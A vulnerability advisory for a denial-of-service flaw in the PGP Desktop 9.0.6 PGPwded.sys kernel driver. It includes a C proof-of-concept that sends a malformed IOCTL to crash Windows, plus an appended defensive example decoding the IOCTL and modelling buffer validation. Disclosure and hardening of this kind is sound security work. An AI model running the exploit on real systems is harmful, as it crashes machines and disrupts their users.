PGP Desktop's PGPwded.sys driver does not sanitize user-supplied input (IOCTL), which leads to a driver crash that takes the system down with a BSOD.
Credit:
The information has been provided by evil fingers.
The original article can be found at: http://www.evilfingers.com/advisory/PGPDesktop_9_0_6_Denial_Of_Service.pdf
Vulnerable Systems:
* PGP Desktop version 9.0.6
The affected PGPwded.sys IOCTL is 0x80022038:
+-------------------------------------------------+
Device Type: Custom Device Type: 0x8002, 32770
Transfer Type: METHOD_BUFFERED (0x0, 0)
Access Type: FILE_ANY_ACCESS (0x0, 0)
Function Code: 0x80E, 2062
+-------------------------------------------------+
Exploit:
/* PGPwded.sys KERNEL_MODE_EXCEPTION_NOT_HANDLED - DoS PoC
*
* Author: Giuseppe 'Evilcry' Bonfa'
* E-Mail: evilcry {AT} gmail. {DOT} com
* Website: http://evilcry.netsons.org
*
*/
/*
Since we had publishing problems, we used spaces between escape < char and the include file as shown here: #include < windows.h >, to compile you have to delete the space.
*/
#include < windows.h >
#include < stdio.h >
#include < stdlib.h >
int main(void)
{
    HANDLE hDevice;
    DWORD Dummy;

    system("cls");
    printf("\n .:: PGP Enterprise DoS Proof of Concept ::.\n");

    hDevice = CreateFileA("\\\\.\\PGPwdef",
                          0,
                          FILE_SHARE_READ | FILE_SHARE_WRITE,
                          NULL,
                          OPEN_EXISTING,
                          0,
                          NULL);

    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("\n Unable to Open PGPwded Device Driver\n");
        return EXIT_FAILURE;
    }

    DeviceIoControl(hDevice, 0x80022038, (LPVOID) 0x80000001, 0, (LPVOID) 0x80000002, 0, &Dummy, (LPOVERLAPPED)NULL);

    return EXIT_SUCCESS;
}
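
Added example (not part of the original advisory and not PGP's driver code): decode_ioctl splits 0x80022038 with the CTL_CODE bit layout and reproduces the table above, and check_buffered_request models the length validation a METHOD_BUFFERED handler performs before touching its buffer. The request struct, the result codes and the 4-byte minimum sizes are assumptions made for illustration; the advisory does not say what the handler expects.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Bit layout of a Windows I/O control code (the CTL_CODE macro). */
typedef struct {
    uint32_t device_type; /* bits 31..16 */
    uint32_t access;      /* bits 15..14 */
    uint32_t function;    /* bits 13..2  */
    uint32_t method;      /* bits 1..0, 0 = METHOD_BUFFERED */
} ioctl_fields;

ioctl_fields decode_ioctl(uint32_t code)
{
    ioctl_fields f = { code >> 16, (code >> 14) & 0x3, (code >> 2) & 0xFFF, code & 0x3 };
    return f;
}

/* Hypothetical user-mode model of what a buffered handler is given. */
typedef struct {
    uint32_t code;
    void    *system_buffer;   /* kernel copy of caller data; NULL when both lengths are 0 */
    uint32_t in_len, out_len; /* lengths supplied by the caller */
} buffered_request;

/* Illustrative result codes, not real NTSTATUS values. */
enum { REQ_OK, REQ_WRONG_METHOD, REQ_TOO_SMALL, REQ_NO_BUFFER };

/* min_in/min_out: sizes the handler needs (assumed; not given in the advisory). */
int check_buffered_request(const buffered_request *r, uint32_t min_in, uint32_t min_out)
{
    if (decode_ioctl(r->code).method != 0)
        return REQ_WRONG_METHOD;
    if (r->in_len < min_in || r->out_len < min_out)
        return REQ_TOO_SMALL;
    if (r->system_buffer == NULL && (min_in || min_out))
        return REQ_NO_BUFFER;
    return REQ_OK;
}

int main(void)
{
    /* Constructed sample: the advisory's IOCTL with both lengths set to 0. */
    buffered_request poc = { 0x80022038u, NULL, 0, 0 };
    ioctl_fields f = decode_ioctl(poc.code);
    printf("type=0x%X function=0x%X\n", (unsigned)f.device_type, (unsigned)f.function);
    printf("check=%d\n", check_buffered_request(&poc, 4, 4));
    return 0;
}
```

A handler that runs this kind of check first fails the request with an error status instead of dereferencing a buffer the caller never supplied.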